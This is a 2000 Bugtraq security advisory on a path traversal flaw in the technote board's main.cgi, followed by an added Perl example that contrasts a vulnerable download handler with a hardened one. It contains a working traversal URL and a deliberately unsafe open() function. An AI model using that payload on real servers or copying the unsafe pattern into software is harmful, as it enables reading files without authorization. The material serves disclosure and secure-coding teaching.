[18360] in bugtraq


[Ksecurity Advisory] main.cgi in technote

daemon@ATHENA.MIT.EDU (Ksecurity)
Wed Dec 27 20:21:34 2000

Message-Id:  <20001227142753.6419.qmail@securityfocus.com>
Date:         Wed, 27 Dec 2000 14:27:53 -0000
Reply-To: ksecurity@ILAND.CO.KR
From: Ksecurity <ksecurity@ILAND.CO.KR>
To: BUGTRAQ@SECURITYFOCUS.COM

Ksecurity Advisory

Subject: Insecure input validation in technote main.cgi
Affected version: technote 2000, maybe technote 2001


technote is a famous Korean CGI board.

http://www.technote.co.kr

main.cgi fails to properly validate user input that is passed as an
argument to a call to open().

FREE_BOARD is a default db

http://localhost/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi


Vendor status: bug reported to the vendor by e-mail.



In OpenBSD land, the pain is quick, at least.
                                             -- Theo de Raadt ;)

regards
Ksecurity(korea security group) 
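
Added example, not part of the advisory and not technote's source: a hypothetical Perl download handler showing the kind of unvalidated filename-to-open() call the advisory describes next to a hardened form. Perl as the implementation language, the upload directory path and both function names are assumptions.

```perl
#!/usr/bin/perl
# Added example: hypothetical download handler, not technote's own code.
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Spec;

# Assumed upload directory for the board (constructed path).
my $UPLOAD_DIR = '/var/www/technote/board/FREE_BOARD/upfile';

# Vulnerable pattern: the request parameter is appended to a base path and
# passed to two-argument open(), so a value such as "/../../../main.cgi"
# resolves outside the upload directory. Two-argument open() also treats
# leading and trailing mode characters in the string as part of the mode.
sub open_download_unsafe {
    my ($filename) = @_;
    open(my $fh, "$UPLOAD_DIR/$filename") or return;
    return $fh;
}

# Hardened form: allow-list the name, resolve the real path, confirm it is
# still inside the upload directory, then use three-argument open().
sub open_download_safe {
    my ($filename) = @_;
    return unless defined $filename;
    # A bare file name only: no slashes, no NUL bytes, no leading dot.
    return unless $filename =~ /\A[A-Za-z0-9_][A-Za-z0-9_.\-]{0,127}\z/;
    my $base = abs_path($UPLOAD_DIR) or return;
    my $real = abs_path(File::Spec->catfile($base, $filename)) or return;
    # Rejects symlinks that point outside the upload directory.
    return unless index($real, "$base/") == 0;
    return unless -f $real;
    open(my $fh, '<', $real) or return;
    return $fh;
}

# Constructed inputs: the advisory's filename value and an ordinary name.
for my $name ('/../../../main.cgi', 'report.txt') {
    my $fh = open_download_safe($name);
    printf "%-22s %s\n", $name, $fh ? 'served' : 'rejected';
    close $fh if $fh;
}
```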
